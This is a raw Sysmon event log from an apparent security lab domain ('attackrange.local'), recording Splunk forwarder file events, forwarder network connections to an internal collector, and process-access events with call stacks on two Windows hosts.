16:32:06.362{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75333CBBBEA3C95ACBA79C13F2F0AD45,SHA256=C537CAC45DA4CC2CA7DB26ADECC7C706A8FB9AA94003EDD39335EEA250188CFC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246347Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:06.129{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00E03D50393286AEE92A723AD73CD6FB,SHA256=6E5CC6AF22E7E1C03C86C49B0BE6F2F5EFF539CA250FBE178A1120256A79347D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000246346Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:04.547{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64812-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x80000000000000001061540Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:07.722{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2E7B99F0BCDEB69EC5008A05A54B3B1,SHA256=21B9059AA68D80FE2DBF36429283AC1A5B12DC84353BD924E127662331FBE105,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061539Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:07.722{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=89E8C3785D3100C64F4A737373D3E5A1,SHA256=D5DAA00C8DBCB205E5B9167106F73234D05F4785A17C57A76B583BDE200628DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246348Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:07.129{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E78396A5337F5FA2333C0CCB0C62F2D4,SHA256=CEE72A02CFBE4D27990F94414C2CA9346E695763887F53DEDAB658E02C24A5CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246349Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:08.129{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3ED34CF88C74946A8B427A737F4CC730,SHA256=95B220B69BDED39E568299EF70237B65E7CC45805CC10FF683C1BD3C8F1C2570,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061541Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:09.081{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1020796DED5AE60648099FB48342AA29,SHA256=96EFD85C7DE92DEF68FA0B251E75EEDFCAF9212D41A043F79A917141759A7CC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246350Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:09.129{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12952FC63CAE438FEB8A39C774FB9E63,SHA256=60FAD7E79D275DA84979F3BF369E58D14B340403D1E90728D69CA314B61F717D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061542Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:10.456{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53C065CBBC7B28CD5FE1EC51FBF95228,SHA256=4C7C56F6F526BD16624EEF508221C3A6990636B01193CE2611F9769BE78D6648,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246353Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:10.129{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F8B864D5819F6B52AC562D472E0CB6CE,SHA256=6E912841CA91364483E9E038E4EA7EC9E0FF7B43335F4EC9356683541B1B72EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246352Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:10.129{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=431E9AD4BA35A426E15E45171735AED9,SHA256=279F7A4DD22D3D2586339276260F4EBAC3FD2298CEF9AF2740181B0C44406AAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246351Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:10.129{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9465EB17782F09ED6EF512764818D145,SHA256=7A9B77F665828DF9D195B0BA4A0BC05FE56C0DA3608D9F1D06354FDF67791330,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061544Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:08.990{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54844-false10.0.1.12-8000- 23542300x80000000000000001061543Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:11.816{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E87027571BD14ECB29F19542D829A0F3,SHA256=4AE152DFDCE7227145C4483A56B67BCAFA0F79B3705383C2951448BF93B39091,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246355Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:11.129{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2CA4C554F1AD1C63DCC98334B27FAE1,SHA256=9EDFA672EF6259B0A799A5BF586D5C293F14476536E6C14303B23C3CD7010133,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000246354Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:09.563{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64813-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000246356Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:12.129{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF90567AF99EFF53C51E7590DE14E36A,SHA256=6B06479FC648EEEE16E3E8660ED4E9D5B08CB5E7386FF784A85911F1A0679176,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061545Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:13.175{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC946C32164D3F6279783397FE56DE0B,SHA256=15DF4361432B2E92C9CAFB3C8FDA813D4A3F7F8E776C6DAE5B9D3FBA386BE57D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246357Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:13.129{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A5A456B48528821AED54911DA50567F,SHA256=FB7E68A3C92079637C8A2D3C91EA3605DC048ECE21BED32E798B6D9E5AE35BF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061546Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:14.535{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F59A335C80A533AAD219B0CA83D8923,SHA256=55C6EBBD9E59D454CE1442BE65AF476709F85641EE63680CE2D79ECDC0BCCF90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246358Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:14.129{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3582260BFA99E5051F216E8CA1C08D3,SHA256=42B5F324FD15E753309DA2A0898B65A6E90F3580A349600179C5C394DF79587A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061547Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:15.894{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67D4D1C1CB12D0F2E6D9AB1C5DA51FB4,SHA256=576CC5C67171B8C3E4045407F648840E344CC22AB4F7752CE26B761D23DD6DDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246361Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:15.394{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5B4FB447568E2E8ECBD946AED05CFDB7,SHA256=E06EE952263E397D927147CC5FE3458B2F0FCF0D24A3A14E5772D1E9CDE956C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246360Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:15.394{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F8B864D5819F6B52AC562D472E0CB6CE,SHA256=6E912841CA91364483E9E038E4EA7EC9E0FF7B43335F4EC9356683541B1B72EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246359Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:15.129{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B27D3181D274CB98CE780595F52CFFC2,SHA256=B69E50138C7E71ADBD7C419F1B5DA6A2593DF9A5D19FE4D4B64F530956C96276,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061548Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:16.582{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=90E554E10EDD3DA9E7CE0440243A79E8,SHA256=E8040F09729C254B17A224B6668B7788F4BB2FCF11C9C40D50695B2F62A4EFA5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000246363Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:14.609{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64814-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000246362Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:16.129{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18C332E24C463870A9C20ADF3DD7CEA2,SHA256=0F507402DD7B6526F1068E79CBD6DD5785B2A8D70AFC48D8ACCF0A3A8A77A5FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061549Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:17.254{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E66D114F7582C09C420FC675B7AAA2A1,SHA256=ED5979614E331C1DB9F0BBB785A440F0B93B6DC400974C81E1464DB2559F9DCB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246364Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:17.129{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7FF06F3B65E8567E90124D8560A8606,SHA256=671990CE1CD115CC6C2AED2ECA78FFA118739054A9B2AC0248522E3C7C871706,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061551Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:18.613{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89345A2EC176FBFFE278E8CFFD3EBEAB,SHA256=ADBEA71C812F68A200E8217D0DC9F9BBDB2949FBBC5272AE874981FBF24BA549,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061550Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:14.959{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54845-false10.0.1.12-8000- 23542300x8000000000000000246365Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:18.129{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6756B2C357535EC4C231D26F03EFDB7,SHA256=F90BD87E377054B75BC7DCD14516C1E531FC839386891D62909AC18A718BAEB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246366Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:19.129{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDF3D2576B281A0DEA3E10E7B4FC0CA6,SHA256=BC46F28FA529391C4C47B3C0C7B200F9AED64282AEAD1BB8CEA91F6E4B81AE80,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000246380Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:20.958{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-5294-6063-C622-00000000AF01}3784C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246379Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:20.958{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246378Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:20.958{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246377Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:20.958{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246376Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:20.958{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246375Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:20.958{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246374Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:20.958{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246373Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:20.958{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246372Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 